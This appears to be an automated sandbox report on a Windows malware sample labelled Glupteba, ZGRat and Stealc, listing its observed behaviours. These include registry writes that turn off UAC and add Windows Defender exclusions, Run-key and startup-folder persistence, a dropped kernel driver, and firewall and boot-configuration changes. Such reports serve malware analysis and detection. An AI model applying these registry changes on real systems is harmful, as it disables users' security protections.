Analysis Overview
SHA256
ca70a19b730b569ccdd5a903f7cbb98a0ac40a62a77b3d817b65c0f0c9a37620
Threat Level: Known bad
The file ca70a19b730b569ccdd5a903f7cbb98a0ac40a62a77b3d817b65c0f0c9a37620 was found to be: Known bad.
Malicious Activity Summary
Glupteba
UAC bypass
ZGRat
Detect ZGRat V1
Glupteba payload
Windows security bypass
Stealc
Modifies boot configuration data using bcdedit
Possible attempt to disable PatchGuard
Downloads MZ/PE file
Modifies Windows Firewall
Drops file in Drivers directory
Command and Scripting Interpreter: PowerShell
Drops startup file
Windows security modification
Executes dropped EXE
UPX packed file
Loads dropped DLL
Manipulates WinMon driver.
Adds Run key to start application
Checks whether UAC is enabled
Legitimate hosting services abused for malware hosting/C2
Manipulates WinMonFS driver.
Checks installed software on the system
Suspicious use of SetThreadContext
Drops file in System32 directory
Drops file in Windows directory
Checks for VirtualBox DLLs, possible anti-VM trick
Launches sc.exe
Enumerates physical storage devices
Program crash
Modifies system certificate store
Creates scheduled task(s)
Suspicious behavior: LoadsDriver
System policy modification
GoLang User-Agent
Checks SCSI registry key(s)
Uses Task Scheduler COM API
Suspicious use of FindShellTrayWindow
Checks processor information in registry
Suspicious use of WriteProcessMemory
Suspicious behavior: EnumeratesProcesses
Modifies data under HKEY_USERS
Suspicious use of SendNotifyMessage
Suspicious use of AdjustPrivilegeToken
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-05-08 23:52
Signatures
Analysis: behavioral1
Detonation Overview
Submitted
2024-05-08 23:52
Reported
2024-05-08 23:57
Platform
win7-20240508-en
Max time kernel
298s
Max time network
291s
Command Line
Signatures
Detect ZGRat V1
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Glupteba
Glupteba payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Stealc
UAC bypass
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Users\Admin\AppData\Local\Temp\ca70a19b730b569ccdd5a903f7cbb98a0ac40a62a77b3d817b65c0f0c9a37620.exe | N/A |
Windows security bypass
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\DgEQpmig2k2u8ahd5cM0IXOL.exe = "0" | C:\Users\Admin\Pictures\DgEQpmig2k2u8ahd5cM0IXOL.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\yNIUqrzSFbniO7QgiDNi1e5u.exe = "0" | C:\Users\Admin\Pictures\yNIUqrzSFbniO7QgiDNi1e5u.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\csrss.exe = "0" | C:\Users\Admin\Pictures\2U5ElIDy3tFD0tPHgA1ebjtp.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\2U5ElIDy3tFD0tPHgA1ebjtp.exe = "0" | C:\Users\Admin\Pictures\2U5ElIDy3tFD0tPHgA1ebjtp.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\windefender.exe = "0" | C:\Users\Admin\Pictures\2U5ElIDy3tFD0tPHgA1ebjtp.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\System32\drivers = "0" | C:\Users\Admin\Pictures\2U5ElIDy3tFD0tPHgA1ebjtp.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\windefender.exe = "0" | C:\Users\Admin\Pictures\2U5ElIDy3tFD0tPHgA1ebjtp.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\JziJRjwTPjmAIVQ7YR4wEkVF.exe = "0" | C:\Users\Admin\Pictures\JziJRjwTPjmAIVQ7YR4wEkVF.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\rss = "0" | C:\Users\Admin\Pictures\2U5ElIDy3tFD0tPHgA1ebjtp.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\csrss = "0" | C:\Users\Admin\Pictures\2U5ElIDy3tFD0tPHgA1ebjtp.exe | N/A |
ZGRat
Modifies boot configuration data using bcdedit
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\bcdedit.exe | N/A |
| N/A | N/A | C:\Windows\system32\bcdedit.exe | N/A |
| N/A | N/A | C:\Windows\system32\bcdedit.exe | N/A |
| N/A | N/A | C:\Windows\system32\bcdedit.exe | N/A |
| N/A | N/A | C:\Windows\system32\bcdedit.exe | N/A |
| N/A | N/A | C:\Windows\system32\bcdedit.exe | N/A |
| N/A | N/A | C:\Windows\system32\bcdedit.exe | N/A |
| N/A | N/A | C:\Windows\system32\bcdedit.exe | N/A |
| N/A | N/A | C:\Windows\system32\bcdedit.exe | N/A |
| N/A | N/A | C:\Windows\system32\bcdedit.exe | N/A |
| N/A | N/A | C:\Windows\system32\bcdedit.exe | N/A |
| N/A | N/A | C:\Windows\system32\bcdedit.exe | N/A |
| N/A | N/A | C:\Windows\system32\bcdedit.exe | N/A |
| N/A | N/A | C:\Windows\system32\bcdedit.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Downloads MZ/PE file
Drops file in Drivers directory
| Description | Indicator | Process | Target |
| File created | C:\Windows\system32\drivers\Winmon.sys | C:\Windows\rss\csrss.exe | N/A |
Modifies Windows Firewall
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\netsh.exe | N/A |
| N/A | N/A | C:\Windows\system32\netsh.exe | N/A |
| N/A | N/A | C:\Windows\system32\netsh.exe | N/A |
| N/A | N/A | C:\Windows\system32\netsh.exe | N/A |
Possible attempt to disable PatchGuard
Drops startup file
| Description | Indicator | Process | Target |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\b6qsLfkqIoTPwoWsUv6y5Cxm.bat | C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | N/A |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\e9ZoIBhiec9y0MQ8LN1Ew4A7.bat | C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | N/A |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\7thwCggTlPUkHNTYhfDZ8bBD.bat | C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | N/A |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\8kdfOL5pS2ZJD6XKGWDerABo.bat | C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | N/A |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\9X5eQ89hOsyIn0HVfNoLbArx.bat | C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | N/A |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\qFp7wCxROjWfnJ9EWLOFXkId.bat | C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | N/A |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\lRQGxNAaydztbjZ2MhKqsJyR.bat | C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | N/A |
Executes dropped EXE
Loads dropped DLL
UPX packed file
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Windows security modification
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\windefender.exe = "0" | C:\Users\Admin\Pictures\2U5ElIDy3tFD0tPHgA1ebjtp.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\System32\drivers = "0" | C:\Users\Admin\Pictures\2U5ElIDy3tFD0tPHgA1ebjtp.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\windefender.exe = "0" | C:\Users\Admin\Pictures\2U5ElIDy3tFD0tPHgA1ebjtp.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\DgEQpmig2k2u8ahd5cM0IXOL.exe = "0" | C:\Users\Admin\Pictures\DgEQpmig2k2u8ahd5cM0IXOL.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\yNIUqrzSFbniO7QgiDNi1e5u.exe = "0" | C:\Users\Admin\Pictures\yNIUqrzSFbniO7QgiDNi1e5u.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\rss = "0" | C:\Users\Admin\Pictures\2U5ElIDy3tFD0tPHgA1ebjtp.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\csrss.exe = "0" | C:\Users\Admin\Pictures\2U5ElIDy3tFD0tPHgA1ebjtp.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\2U5ElIDy3tFD0tPHgA1ebjtp.exe = "0" | C:\Users\Admin\Pictures\2U5ElIDy3tFD0tPHgA1ebjtp.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\JziJRjwTPjmAIVQ7YR4wEkVF.exe = "0" | C:\Users\Admin\Pictures\JziJRjwTPjmAIVQ7YR4wEkVF.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\csrss = "0" | C:\Users\Admin\Pictures\2U5ElIDy3tFD0tPHgA1ebjtp.exe | N/A |
Adds Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-268080393-3149932598-1824759070-1000\Software\Microsoft\Windows\CurrentVersion\Run\csrss = "\"C:\\Windows\\rss\\csrss.exe\"" | C:\Users\Admin\Pictures\2U5ElIDy3tFD0tPHgA1ebjtp.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-268080393-3149932598-1824759070-1000\Software\Microsoft\Windows\CurrentVersion\Run\csrss = "\"C:\\Windows\\rss\\csrss.exe\"" | C:\Users\Admin\Pictures\JziJRjwTPjmAIVQ7YR4wEkVF.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-268080393-3149932598-1824759070-1000\Software\Microsoft\Windows\CurrentVersion\Run\csrss = "\"C:\\Windows\\rss\\csrss.exe\"" | C:\Users\Admin\Pictures\DgEQpmig2k2u8ahd5cM0IXOL.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-268080393-3149932598-1824759070-1000\Software\Microsoft\Windows\CurrentVersion\Run\csrss = "\"C:\\Windows\\rss\\csrss.exe\"" | C:\Users\Admin\Pictures\yNIUqrzSFbniO7QgiDNi1e5u.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-268080393-3149932598-1824759070-1000\Software\Microsoft\Windows\CurrentVersion\Run\csrss = "\"C:\\Windows\\rss\\csrss.exe\"" | C:\Windows\rss\csrss.exe | N/A |
Checks installed software on the system
Checks whether UAC is enabled
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | C:\Users\Admin\AppData\Local\Temp\ca70a19b730b569ccdd5a903f7cbb98a0ac40a62a77b3d817b65c0f0c9a37620.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Users\Admin\AppData\Local\Temp\ca70a19b730b569ccdd5a903f7cbb98a0ac40a62a77b3d817b65c0f0c9a37620.exe | N/A |
Legitimate hosting services abused for malware hosting/C2
| Description | Indicator | Process | Target |
| N/A | pastebin.com | N/A | N/A |
| N/A | pastebin.com | N/A | N/A |
Manipulates WinMon driver.
| Description | Indicator | Process | Target |
| File opened for modification | \??\WinMon | C:\Windows\rss\csrss.exe | N/A |
Manipulates WinMonFS driver.
| Description | Indicator | Process | Target |
| File opened for modification | \??\WinMonFS | C:\Windows\rss\csrss.exe | N/A |
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 2604 set thread context of 2796 | N/A | C:\Users\Admin\AppData\Local\Temp\ca70a19b730b569ccdd5a903f7cbb98a0ac40a62a77b3d817b65c0f0c9a37620.exe | C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe |
Checks for VirtualBox DLLs, possible anti-VM trick
| Description | Indicator | Process | Target |
| File opened (read-only) | \??\VBoxMiniRdrDN | C:\Users\Admin\Pictures\yNIUqrzSFbniO7QgiDNi1e5u.exe | N/A |
| File opened (read-only) | \??\VBoxMiniRdrDN | C:\Users\Admin\Pictures\2U5ElIDy3tFD0tPHgA1ebjtp.exe | N/A |
| File opened (read-only) | \??\VBoxMiniRdrDN | C:\Users\Admin\Pictures\JziJRjwTPjmAIVQ7YR4wEkVF.exe | N/A |
| File opened (read-only) | \??\VBoxMiniRdrDN | C:\Users\Admin\Pictures\DgEQpmig2k2u8ahd5cM0IXOL.exe | N/A |
Drops file in Windows directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Windows\rss | C:\Users\Admin\Pictures\2U5ElIDy3tFD0tPHgA1ebjtp.exe | N/A |
| File created | C:\Windows\rss\csrss.exe | C:\Users\Admin\Pictures\DgEQpmig2k2u8ahd5cM0IXOL.exe | N/A |
| File created | C:\Windows\rss\csrss.exe | C:\Users\Admin\Pictures\yNIUqrzSFbniO7QgiDNi1e5u.exe | N/A |
| File created | C:\Windows\windefender.exe | C:\Windows\rss\csrss.exe | N/A |
| File opened for modification | C:\Windows\rss | C:\Users\Admin\Pictures\yNIUqrzSFbniO7QgiDNi1e5u.exe | N/A |
| File opened for modification | C:\Windows\windefender.exe | C:\Windows\rss\csrss.exe | N/A |
| File created | C:\Windows\Logs\CBS\CbsPersist_20240508235243.cab | C:\Windows\system32\makecab.exe | N/A |
| File created | C:\Windows\rss\csrss.exe | C:\Users\Admin\Pictures\2U5ElIDy3tFD0tPHgA1ebjtp.exe | N/A |
| File opened for modification | C:\Windows\rss | C:\Users\Admin\Pictures\JziJRjwTPjmAIVQ7YR4wEkVF.exe | N/A |
| File created | C:\Windows\rss\csrss.exe | C:\Users\Admin\Pictures\JziJRjwTPjmAIVQ7YR4wEkVF.exe | N/A |
| File opened for modification | C:\Windows\rss | C:\Users\Admin\Pictures\DgEQpmig2k2u8ahd5cM0IXOL.exe | N/A |
Launches sc.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\sc.exe | N/A |
Enumerates physical storage devices
Checks SCSI registry key(s)
| Description | Indicator | Process | Target |
| Key queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C:\Users\Admin\AppData\Local\Temp\u1ls.1.exe | N/A |
| Key enumerated | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C:\Users\Admin\AppData\Local\Temp\u1ls.1.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C:\Users\Admin\AppData\Local\Temp\u1ls.1.exe | N/A |
Checks processor information in registry
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | C:\Users\Admin\AppData\Local\Temp\u1ls.0.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Users\Admin\AppData\Local\Temp\u1ls.0.exe | N/A |
Creates scheduled task(s)
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
Modifies data under HKEY_USERS
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-741 = "New Zealand Daylight Time" | C:\Windows\windefender.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-401 = "Arabic Daylight Time" | C:\Users\Admin\Pictures\2U5ElIDy3tFD0tPHgA1ebjtp.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-662 = "Cen. Australia Standard Time" | C:\Users\Admin\Pictures\2U5ElIDy3tFD0tPHgA1ebjtp.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-871 = "Pakistan Daylight Time" | C:\Users\Admin\Pictures\2U5ElIDy3tFD0tPHgA1ebjtp.exe | N/A |
| Set value (data) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000 | C:\Windows\system32\netsh.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-51 = "Greenland Daylight Time" | C:\Windows\windefender.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-365 = "Middle East Standard Time" | C:\Windows\windefender.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-385 = "Namibia Standard Time" | C:\Windows\windefender.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-201 = "US Mountain Daylight Time" | C:\Windows\windefender.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-421 = "Russian Daylight Time" | C:\Users\Admin\Pictures\2U5ElIDy3tFD0tPHgA1ebjtp.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-932 = "Coordinated Universal Time" | C:\Users\Admin\Pictures\2U5ElIDy3tFD0tPHgA1ebjtp.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-221 = "Alaskan Daylight Time" | C:\Windows\windefender.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-441 = "Arabian Daylight Time" | C:\Windows\windefender.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-592 = "Malay Peninsula Standard Time" | C:\Users\Admin\Pictures\2U5ElIDy3tFD0tPHgA1ebjtp.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-201 = "US Mountain Daylight Time" | C:\Users\Admin\Pictures\2U5ElIDy3tFD0tPHgA1ebjtp.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-772 = "Montevideo Standard Time" | C:\Windows\windefender.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-632 = "Tokyo Standard Time" | C:\Windows\windefender.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-448 = "Azerbaijan Daylight Time" | C:\Users\Admin\Pictures\2U5ElIDy3tFD0tPHgA1ebjtp.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-171 = "Central Daylight Time (Mexico)" | C:\Users\Admin\Pictures\2U5ElIDy3tFD0tPHgA1ebjtp.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-292 = "Central European Standard Time" | C:\Windows\windefender.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-364 = "Middle East Daylight Time" | C:\Windows\windefender.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-521 = "N. Central Asia Daylight Time" | C:\Windows\windefender.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-434 = "Georgian Daylight Time" | C:\Users\Admin\Pictures\2U5ElIDy3tFD0tPHgA1ebjtp.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-982 = "Kamchatka Standard Time" | C:\Users\Admin\Pictures\2U5ElIDy3tFD0tPHgA1ebjtp.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-962 = "Paraguay Standard Time" | C:\Users\Admin\Pictures\2U5ElIDy3tFD0tPHgA1ebjtp.exe | N/A |
| Set value (data) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000 | C:\Users\Admin\Pictures\yNIUqrzSFbniO7QgiDNi1e5u.exe | N/A |
| Set value (data) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000 | C:\Users\Admin\Pictures\DgEQpmig2k2u8ahd5cM0IXOL.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\SYSTEM\CurrentControlSet\Control\NetTrace | C:\Windows\system32\netsh.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-842 = "Argentina Standard Time" | C:\Windows\windefender.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-832 = "SA Eastern Standard Time" | C:\Windows\windefender.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-11 = "Azores Daylight Time" | C:\Users\Admin\Pictures\2U5ElIDy3tFD0tPHgA1ebjtp.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-331 = "E. Europe Daylight Time" | C:\Users\Admin\Pictures\2U5ElIDy3tFD0tPHgA1ebjtp.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-771 = "Montevideo Daylight Time" | C:\Users\Admin\Pictures\2U5ElIDy3tFD0tPHgA1ebjtp.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-242 = "Samoa Standard Time" | C:\Users\Admin\Pictures\2U5ElIDy3tFD0tPHgA1ebjtp.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\dhcpqec.dll,-101 = "Provides DHCP based enforcement for NAP" | C:\Windows\system32\netsh.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-232 = "Hawaiian Standard Time" | C:\Windows\windefender.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-334 = "Jordan Daylight Time" | C:\Users\Admin\Pictures\2U5ElIDy3tFD0tPHgA1ebjtp.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\napipsec.dll,-4 = "1.0" | C:\Windows\system32\netsh.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-442 = "Arabian Standard Time" | C:\Windows\windefender.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-82 = "Atlantic Standard Time" | C:\Windows\windefender.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-541 = "Myanmar Daylight Time" | C:\Windows\windefender.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-211 = "Pacific Daylight Time" | C:\Windows\windefender.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-22 = "Cape Verde Standard Time" | C:\Users\Admin\Pictures\2U5ElIDy3tFD0tPHgA1ebjtp.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-362 = "GTB Standard Time" | C:\Users\Admin\Pictures\2U5ElIDy3tFD0tPHgA1ebjtp.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-231 = "Hawaiian Daylight Time" | C:\Users\Admin\Pictures\2U5ElIDy3tFD0tPHgA1ebjtp.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-772 = "Montevideo Standard Time" | C:\Users\Admin\Pictures\2U5ElIDy3tFD0tPHgA1ebjtp.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-392 = "Arab Standard Time" | C:\Windows\windefender.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-731 = "Fiji Daylight Time" | C:\Windows\windefender.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-122 = "SA Pacific Standard Time" | C:\Windows\windefender.exe | N/A |
